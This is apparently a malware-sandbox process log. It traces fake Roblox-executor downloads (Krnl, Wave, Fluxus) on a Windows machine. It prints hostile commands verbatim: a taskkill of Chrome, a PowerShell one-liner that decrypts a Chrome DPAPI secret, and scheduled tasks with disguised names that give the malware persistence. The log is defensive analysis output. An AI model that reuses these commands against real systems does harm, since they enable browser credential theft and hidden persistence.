    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3732 /prefetch:1
    3⤵
    PID:4860
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5576 /prefetch:1
    3⤵
    PID:4920
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
    3⤵
    PID:3136
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:1
    3⤵
    PID:4332
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6540 /prefetch:1
    3⤵
    PID:2616
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3740 /prefetch:1
    3⤵
    PID:3524
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5352 /prefetch:8
    3⤵
    PID:5080
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6336 /prefetch:1
    3⤵
    PID:5692
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3600 /prefetch:1
    3⤵
    PID:5424
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1
    3⤵
    PID:5376
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6504 /prefetch:1
    3⤵
    PID:2564
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3632 /prefetch:1
    3⤵
    PID:4076
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:1
    3⤵
    PID:3252
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6216 /prefetch:8
    3⤵
    PID:5884
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:1
    3⤵
    PID:1884
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6996 /prefetch:2
    3⤵
    PID:4744
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6448 /prefetch:1
    3⤵
    PID:5724
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7084 /prefetch:1
    3⤵
    PID:5604
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6516 /prefetch:1
    3⤵
    PID:3096
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6420 /prefetch:1
    3⤵
    PID:5816
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5372 /prefetch:8
    3⤵
    PID:2348
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3632 /prefetch:1
    3⤵
    PID:4140
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4132 /prefetch:1
    3⤵
    PID:1200
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6516 /prefetch:1
    3⤵
    PID:5240
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1836 /prefetch:1
    3⤵
    PID:6092
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7056 /prefetch:1
    3⤵
    PID:2384
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7028 /prefetch:1
    3⤵
    PID:5116
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5752 /prefetch:1
    3⤵
    PID:5276
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5740 /prefetch:1
    3⤵
    PID:3076
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6224 /prefetch:1
    3⤵
    PID:2476
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4124 /prefetch:1
    3⤵
    PID:4488
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6472 /prefetch:8
    3⤵
    PID:5384
- - C:\Windows\System32\msiexec.exe
    "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\Krnl_8.10.8_x64_en-US (1).msi"
    3⤵
    - Enumerates connected drives
    - Suspicious use of AdjustPrivilegeToken
    PID:6024
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5740 /prefetch:1
    3⤵
    PID:4856
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7020 /prefetch:1
    3⤵
    PID:1004
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7236 /prefetch:1
    3⤵
    PID:4896
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7724 /prefetch:8
    3⤵
    PID:1944
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7668 /prefetch:1
    3⤵
    PID:2524
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:1
    3⤵
    PID:5188
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1
    3⤵
    PID:5964
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7028 /prefetch:1
    3⤵
    PID:780
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6448 /prefetch:1
    3⤵
    PID:3416
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4460 /prefetch:1
    3⤵
    PID:3872
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7612 /prefetch:1
    3⤵
    PID:2180
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5068 /prefetch:8
    3⤵
    PID:5876
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1356 /prefetch:1
    3⤵
    PID:1668
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2916 /prefetch:1
    3⤵
    PID:4368
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4036 /prefetch:1
    3⤵
    PID:1508
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7536 /prefetch:1
    3⤵
    PID:5936
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3960 /prefetch:1
    3⤵
    PID:5216
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7820 /prefetch:1
    3⤵
    PID:1268
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7884 /prefetch:8
    3⤵
    PID:1156
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7576 /prefetch:8
    3⤵
    PID:4828
- - C:\Users\Admin\Downloads\WaveInstaller.exe
    "C:\Users\Admin\Downloads\WaveInstaller.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5112
- C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\FluxusLoader\" -spe -an -ai#7zMap20738:86:7zEvent2552
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1276
- C:\Users\Admin\Downloads\FluxusLoader\FluxusLoader.exe
  "C:\Users\Admin\Downloads\FluxusLoader\FluxusLoader.exe"
  2⤵
  - Executes dropped EXE
  PID:5060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM chrome.exe"
    3⤵
    PID:3376
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM chrome.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,187,115,222,109,237,239,249,68,128,62,150,110,211,54,49,36,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,126,124,67,56,33,140,167,28,178,109,232,222,234,206,132,223,40,128,70,95,194,251,210,74,251,121,187,96,155,71,225,87,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,210,207,246,120,181,34,37,185,26,15,76,227,10,34,147,14,229,48,102,39,150,217,56,96,205,192,243,91,198,18,2,160,48,0,0,0,127,169,48,130,197,206,247,56,20,18,139,96,28,215,0,12,155,99,80,193,55,34,117,87,71,123,105,136,223,17,165,103,181,151,47,167,179,124,54,100,189,4,35,13,214,180,32,223,64,0,0,0,142,201,87,44,22,20,41,110,95,60,67,231,202,171,19,118,114,181,113,227,135,26,115,153,29,43,27,111,36,37,226,100,212,124,149,101,168,193,200,149,116,245,255,133,109,4,97,105,127,54,231,21,110,176,59,174,140,3,18,90,56,110,46,73), $null, 'CurrentUser')"
    3⤵
    - An obfuscated cmd.exe command-line is typically used to evade detection.
    PID:6076
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,187,115,222,109,237,239,249,68,128,62,150,110,211,54,49,36,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,126,124,67,56,33,140,167,28,178,109,232,222,234,206,132,223,40,128,70,95,194,251,210,74,251,121,187,96,155,71,225,87,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,210,207,246,120,181,34,37,185,26,15,76,227,10,34,147,14,229,48,102,39,150,217,56,96,205,192,243,91,198,18,2,160,48,0,0,0,127,169,48,130,197,206,247,56,20,18,139,96,28,215,0,12,155,99,80,193,55,34,117,87,71,123,105,136,223,17,165,103,181,151,47,167,179,124,54,100,189,4,35,13,214,180,32,223,64,0,0,0,142,201,87,44,22,20,41,110,95,60,67,231,202,171,19,118,114,181,113,227,135,26,115,153,29,43,27,111,36,37,226,100,212,124,149,101,168,193,200,149,116,245,255,133,109,4,97,105,127,54,231,21,110,176,59,174,140,3,18,90,56,110,46,73), $null, 'CurrentUser')
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2192
- C:\Users\Admin\Downloads\FluxusLoader\FluxusLoader.exe
  "C:\Users\Admin\Downloads\FluxusLoader\FluxusLoader.exe"
  2⤵
  - Executes dropped EXE
  PID:5512
- C:\Users\Admin\Downloads\FluxusLoader\FluxusLoader.exe
  "C:\Users\Admin\Downloads\FluxusLoader\FluxusLoader.exe"
  2⤵
  - Executes dropped EXE
  PID:2176
- C:\Users\Admin\Downloads\FluxusLoader\FluxusLoader.exe
  "C:\Users\Admin\Downloads\FluxusLoader\FluxusLoader.exe"
  2⤵
  - Executes dropped EXE
  PID:4272
- C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Fluxus\" -spe -an -ai#7zMap7452:74:7zEvent16659
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Fluxus\Application.bat" "
  2⤵
  PID:1232
- - C:\Users\Admin\Downloads\Fluxus\lua.exe
    lua.exe cache.txt
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:816
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /sc daily /st 14:03 /f /tn WindowsErrorReporting_ODA3 /tr ""C:\Users\Admin\AppData\Local\ODA3\ODA3.exe" "C:\Users\Admin\AppData\Local\ODA3\cache.txt""
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:5256
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /sc daily /st 14:03 /f /tn Setup /tr "C:/Windows/System32/oobe/Setup.exe" /rl highest
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:5060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Fluxus\Application.bat" "
  2⤵
  PID:3628
- - C:\Users\Admin\Downloads\Fluxus\lua.exe
    lua.exe cache.txt
    3⤵
    - Executes dropped EXE
    PID:6100
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Fluxus\cache.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:5896
- C:\Users\Admin\Downloads\Fluxus\lua.exe
  "C:\Users\Admin\Downloads\Fluxus\lua.exe"
  2⤵
